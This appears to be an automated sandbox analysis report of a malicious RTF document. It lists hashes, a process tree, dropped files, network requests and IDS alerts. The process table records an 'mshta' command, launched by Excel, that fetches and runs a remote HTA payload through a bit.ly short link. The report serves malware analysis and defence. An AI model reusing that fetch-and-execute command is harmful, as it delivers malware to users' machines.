Field | Value |
---|---|
Download | 05e470_773b675a08744dbfb47b888c09158162.doc |
Full analysis | https://app.any.run/tasks/d86e5a83-772b-42f9-a5f9-15d7d284bfb1 |
Verdict | Malicious activity |
Analysis date | April 25, 2019, 13:13:14 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | text/rtf |
File info | Rich Text Format data, version 1, ANSI |
MD5 | 481F42248AAA3E02F00DC453A8EEAFF2 |
SHA1 | 323A67A4F70C559D04162441E37078676EBB4E07 |
SHA256 | 3FFD5CE69BBF8E4A1CA9291744E71FA60BC1B863E5A15268F5B42C43B79DAE83 |
SSDEEP | 3072:CX3/BvEzcgqX3/BvEzcg6X3/BvEzcgqX3/BvEzcguX3/BvEzcg8:o/Bvoc3/Bvocz/Bvocz/Bvoc//BvocT |
Extension / type | .rtf, Rich Text Format (100) |

PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2664 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05e470_773b675a08744dbfb47b888c09158162.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3400 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000 |
3228 | mshta http://www.bitly.com/ChutasdhikhasdAS13 | C:\Windows\system32\mshta.exe | | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
3824 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
4056 | mshta http://www.bitly.com/ChutasdhikhasdAS13 | C:\Windows\system32\mshta.exe | | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR638E.tmp.cvr | — | — | — |
3400 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B9D.tmp.cvr | — | — | — |
3400 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFD36C939DD030B6AB.TMP | — | — | — |
3824 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAD68.tmp.cvr | — | — | — |
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F5C578E.wmf | — | — | — |
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B187D781.wmf | wmf | F805B2269DCC910D671B2B45FE6CB033 | 631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F |
3228 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\warning[1].txt | html | 80E8946AA6A9F56CE537A715C9EAB27E | 6591C2A9CA71A7ECC417E1AFAB6BEADCCEC03F99133EA6A07B6DC94C753D935B |
4056 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\warning[1].txt | html | 80E8946AA6A9F56CE537A715C9EAB27E | 6591C2A9CA71A7ECC417E1AFAB6BEADCCEC03F99133EA6A07B6DC94C753D935B |
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$e470_773b675a08744dbfb47b888c09158162.doc.rtf | pgc | 00CF76CDC232F84A3217428FA453F66B | DEEC40C12F59A000F68E210B9371C52629CC2B718A65407D79C32FA526F2DCC6 |
3228 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt | text | 8CB08150EF7D96FB8D3123162FB18A33 | BFC09E3F830789B000DD6700CAEFFD868C7A21B2B40AD0ADDF29207BC8544247 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3228 | mshta.exe | GET | 302 | 67.199.248.14:80 | http://bitly.com/ChutasdhikhasdAS13 | US | html | 201 b | shared |
4056 | mshta.exe | GET | 302 | 67.199.248.14:80 | http://bitly.com/ChutasdhikhasdAS13 | US | html | 201 b | shared |
4056 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/ChutasdhikhasdAS13 | US | html | 178 b | shared |
3228 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/ChutasdhikhasdAS13 | US | html | 178 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3228 | mshta.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
3228 | mshta.exe | 67.199.248.14:443 | www.bitly.com | Bitly Inc | US | shared |
4056 | mshta.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
— | — | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
4056 | mshta.exe | 67.199.248.14:443 | www.bitly.com | Bitly Inc | US | shared |

Domain | IP | Reputation |
---|---|---|
www.bitly.com | | shared |

PID | Process | Class | Message |
---|---|---|---|
3228 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3228 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
4056 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |